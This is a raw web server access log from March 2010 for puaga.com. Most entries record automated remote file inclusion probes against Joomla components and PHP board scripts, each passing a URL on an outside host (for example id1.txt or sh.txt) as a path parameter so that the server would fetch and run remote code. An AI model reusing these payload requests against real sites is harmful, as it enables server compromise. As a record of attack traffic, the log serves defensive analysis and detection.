79.141.1.200 - - [04/Mar/2010:10:05:09 -0800] "GET /logs/access_100225.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.112.232 - - [04/Mar/2010:10:05:11 -0800] "GET /logs/?S=A HTTP/1.0" 200 4926 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:10:05:24 -0800] "GET /logs/access_100226.log%20%20//delete_comment.php?board_skin_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:10:05:36 -0800] "GET /logs/access.log%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.59.136.42 - - [04/Mar/2010:10:05:39 -0800] "GET /logs/access_100220.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.59.136.42 - - [04/Mar/2010:10:05:40 -0800] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.59.136.42 - - [04/Mar/2010:10:05:42 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:10:05:47 -0800] "GET /logs/access.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.59.136.42 - - [04/Mar/2010:10:06:10 -0800] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.59.136.42 - - [04/Mar/2010:10:06:10 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.59.136.42 - - [04/Mar/2010:10:06:13 -0800] "GET /logs/access_100220.log%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:10:06:22 -0800] "GET /logs/access_100214.log%20%20//delete_comment.php?board_skin_path=http://www.huffmanconsulting.net/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:10:06:29 -0800] "GET /logs/access_100214.log%20%20//delete_comment.php?board_skin_path=http://www.huffmanconsulting.net/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [04/Mar/2010:10:06:30 -0800] "GET /board.php?code=http://www.sosos.co.kr/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:10:06:39 -0800] "GET /logs/access_100226.log%20%20//delete_comment.php?board_skin_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.151.69 - - [04/Mar/2010:10:06:52 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ballarea.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.151.69 - - [04/Mar/2010:10:06:52 -0800] "GET /logs/access_100226.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ballarea.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.151.69 - - [04/Mar/2010:10:06:52 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ballarea.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.59.136.42 - - [04/Mar/2010:10:07:17 -0800] "GET /logs/access_100128.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.112.232 - - [04/Mar/2010:10:07:17 -0800] "GET /logs/access_100304.log HTTP/1.0" 200 1342688 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
87.106.151.69 - - [04/Mar/2010:10:07:31 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ballarea.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.151.69 - - [04/Mar/2010:10:07:31 -0800] "GET /logs/access_100226.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ballarea.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.151.69 - - [04/Mar/2010:10:07:31 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ballarea.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.151.69 - - [04/Mar/2010:10:07:55 -0800] "GET /logs/access_100219.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ballarea.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.162.116.235 - - [04/Mar/2010:10:07:58 -0800] "GET /logs/access_100130.log/?board_skin_path=http://www.karavi.net/components/com_banners/banner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [04/Mar/2010:10:08:17 -0800] "GET /logs/access_100204.log%20%20/convert/mvcw.php?step=1&vwar_root=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [04/Mar/2010:10:08:18 -0800] "GET /logs/access_100208.log%20%20/convert/mvcw.php?step=1&vwar_root=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.151.69 - - [04/Mar/2010:10:08:32 -0800] "GET /logs/access_100226.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ballarea.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.151.69 - - [04/Mar/2010:10:08:32 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ballarea.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.151.69 - - [04/Mar/2010:10:08:32 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ballarea.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:10:08:53 -0800] "GET /logs/access_100226.log%20%20//delete_comment.php?board_skin_path=http://www.huffmanconsulting.net/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.151.69 - - [04/Mar/2010:10:09:13 -0800] "GET /logs/access_100219.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ballarea.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:10:09:17 -0800] "GET /logs/access_100226.log%20%20//delete_comment.php?board_skin_path=http://www.huffmanconsulting.net/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.73.168.38 - - [04/Mar/2010:10:10:42 -0800] "GET /logs/access_100201.log/?sourcedir=http://aiutoz.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.73.168.38 - - [04/Mar/2010:10:10:42 -0800] "GET /logs/?sourcedir=http://aiutoz.interfree.it/id1.txt? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
217.73.168.38 - - [04/Mar/2010:10:10:43 -0800] "GET /?sourcedir=http://aiutoz.interfree.it/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
203.59.136.42 - - [04/Mar/2010:10:11:08 -0800] "GET /logs/access_100128.log%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:10:11:42 -0800] "GET /logs/access_100205.log%20%20///index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.huffmanconsulting.net/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:10:11:42 -0800] "GET /logs///index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.huffmanconsulting.net/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:10:11:43 -0800] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.huffmanconsulting.net/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [04/Mar/2010:10:11:43 -0800] "GET /logs/access_100225.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
195.190.166.35 - - [04/Mar/2010:10:11:43 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
195.190.166.35 - - [04/Mar/2010:10:11:43 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:10:11:59 -0800] "GET /logs/access_100214.log//delete_comment.php?board_skin_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:10:12:10 -0800] "GET /logs/access_100214.log//delete_comment.php?board_skin_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [04/Mar/2010:10:12:17 -0800] "GET /logs/access_100224.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
78.46.87.243 - - [04/Mar/2010:10:12:23 -0800] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.agicare.co.kr/etenid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [04/Mar/2010:10:12:23 -0800] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.agicare.co.kr/etenid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [04/Mar/2010:10:12:23 -0800] "GET /logs/access_100211.log/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.agicare.co.kr/etenid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [04/Mar/2010:10:12:25 -0800] "GET /logs/access_100224.log/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.agicare.co.kr/etenid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
128.241.54.188 - - [04/Mar/2010:10:12:26 -0800] "GET /logs/access_100203.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
128.241.54.188 - - [04/Mar/2010:10:12:26 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.puaga.com"
128.241.54.188 - - [04/Mar/2010:10:12:26 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
84.38.160.77 - - [04/Mar/2010:10:12:27 -0800] "GET /logs/access_100224.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
84.38.160.77 - - [04/Mar/2010:10:12:27 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
84.38.160.77 - - [04/Mar/2010:10:12:27 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
78.24.9.88 - - [04/Mar/2010:10:12:28 -0800] "GET /logs/access_100203.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.24.9.88 - - [04/Mar/2010:10:12:28 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [04/Mar/2010:10:12:28 -0800] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.agicare.co.kr/etenid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.24.9.88 - - [04/Mar/2010:10:12:28 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [04/Mar/2010:10:12:28 -0800] "GET /logs/access_100211.log/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.agicare.co.kr/etenid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [04/Mar/2010:10:12:28 -0800] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.agicare.co.kr/etenid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [04/Mar/2010:10:12:31 -0800] "GET /logs/access_100224.log/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.agicare.co.kr/etenid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.38.160.77 - - [04/Mar/2010:10:12:34 -0800] "GET /logs/access_100225.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:10:12:36 -0800] "GET /logs/access_100205.log///index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.huffmanconsulting.net/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
128.241.54.188 - - [04/Mar/2010:10:12:38 -0800] "GET /logs/access_100206.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:10:12:39 -0800] "GET /logs/access_100218.log%20%20/become_editor.php?theme_path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:10:12:39 -0800] "GET /become_editor.php?theme_path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:10:12:39 -0800] "GET /logs/become_editor.php?theme_path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.24.9.88 - - [04/Mar/2010:10:12:42 -0800] "GET /logs/access_100206.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.94.188 - - [04/Mar/2010:10:12:47 -0800] "GET /logs/access_100203.log%20%20/become_editor.php?theme_path=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.250.252.242 - - [04/Mar/2010:10:12:55 -0800] "GET / HTTP/1.1" 302 2624 "-" "Yandex/1.01.001 (compatible; Win16; I)" "akifbar.puaga.com"
193.137.208.199 - - [04/Mar/2010:10:13:17 -0800] "GET /logs/access.log//errors.php?error=http://ballarea.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [04/Mar/2010:10:13:17 -0800] "GET /logs//errors.php?error=http://ballarea.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [04/Mar/2010:10:13:17 -0800] "GET /errors.php?error=http://ballarea.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:10:13:34 -0800] "GET /logs/access_100214.log%20%20//delete_comment.php?board_skin_path=http://www.huffmanconsulting.net/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:10:13:37 -0800] "GET /logs/access_100205.log%20%20///index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.huffmanconsulting.net/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:10:13:37 -0800] "GET /logs///index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.huffmanconsulting.net/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:10:13:38 -0800] "GET /logs/access_100205.log%20%20///index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.huffmanconsulting.net/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:10:13:38 -0800] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.huffmanconsulting.net/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:10:13:38 -0800] "GET /logs///index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.huffmanconsulting.net/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:10:13:38 -0800] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.huffmanconsulting.net/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:10:13:40 -0800] "GET /logs/access_100214.log%20%20//delete_comment.php?board_skin_path=http://www.huffmanconsulting.net/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:10:13:41 -0800] "GET /logs///index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.huffmanconsulting.net/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:10:13:42 -0800] "GET /logs/access_100205.log%20%20///index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.huffmanconsulting.net/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:10:13:42 -0800] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.huffmanconsulting.net/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:10:13:58 -0800] "GET /logs/access_100205.log///index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.huffmanconsulting.net/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:10:13:59 -0800] "GET /logs/access_100205.log///index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.huffmanconsulting.net/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:10:14:22 -0800] "GET /logs/access_100214.log//delete_comment.php?board_skin_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [04/Mar/2010:10:14:27 -0800] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [04/Mar/2010:10:14:27 -0800] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [04/Mar/2010:10:14:27 -0800] "GET /logs/access_100213.log%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [04/Mar/2010:10:14:28 -0800] "GET /logs/access_100210.log%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:10:14:35 -0800] "GET /logs/access_100226.log//delete_comment.php?board_skin_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:10:14:47 -0800] "GET /logs/access_100205.log///index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.huffmanconsulting.net/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:10:14:55 -0800] "GET /logs/access_100226.log//delete_comment.php?board_skin_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:10:15:26 -0800] "GET /logs/access_100204.log%20%20/convert/mvcw.php?step=1&vwar_root=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.59.136.42 - - [04/Mar/2010:10:15:27 -0800] "GET /logs/access_100130.log%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.59.136.42 - - [04/Mar/2010:10:15:29 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.59.136.42 - - [04/Mar/2010:10:15:29 -0800] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:10:15:40 -0800] "GET /logs/access_100208.log%20%20/convert/mvcw.php?step=1&vwar_root=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:10:15:54 -0800] "GET /logs/access_100220.log%20%20//delete_comment.php?board_skin_path=http://www.huffmanconsulting.net/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:10:16:10 -0800] "GET /logs/access_100220.log%20%20//delete_comment.php?board_skin_path=http://www.huffmanconsulting.net/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:10:16:42 -0800] "GET /logs/access_091210.log///index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.huffmanconsulting.net/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:10:18:04 -0800] "GET /logs///index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.huffmanconsulting.net/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "puaga.com"
67.227.136.138 - - [04/Mar/2010:10:18:04 -0800] "GET /logs/access_091026.log///index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.huffmanconsulting.net/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "puaga.com"
67.227.136.138 - - [04/Mar/2010:10:18:05 -0800] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.huffmanconsulting.net/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "puaga.com"
112.76.72.3 - - [04/Mar/2010:10:18:06 -0800] "GET /bbs///skin/buzzard_espoon/setup.php?dir=http://boats.uksi.ru/sh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
112.76.72.3 - - [04/Mar/2010:10:18:06 -0800] "GET /logs//bbs///skin/buzzard_espoon/setup.php?dir=http://boats.uksi.ru/sh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
112.76.72.3 - - [04/Mar/2010:10:18:06 -0800] "GET /logs/access_100126.log//bbs///skin/buzzard_espoon/setup.php?dir=http://boats.uksi.ru/sh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [04/Mar/2010:10:18:44 -0800] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [04/Mar/2010:10:18:44 -0800] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [04/Mar/2010:10:18:44 -0800] "GET /logs/access_100213.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
